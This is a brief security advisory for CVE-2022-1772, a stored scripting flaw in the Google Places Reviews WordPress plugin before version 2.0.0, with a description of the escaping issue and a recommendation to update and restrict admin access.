CVE-2022-1772

Name of the Vulnerable Software and Affected Versions Google Places Reviews WordPress plugin versions prior to 2.0.0

Description The issue arises from the Google Places Reviews WordPress plugin not properly escaping its Google API key setting, which is reflected on the site's administration panel. In a multisite WordPress configuration, a malicious administrator could exploit this to trick super-administrators into viewing a booby-trapped payload, potentially leading to account takeover.

Recommendations For versions prior to 2.0.0, update to version 2.0.0 or later to resolve the issue. As a temporary workaround, consider restricting access to the administration panel to minimize the risk of exploitation.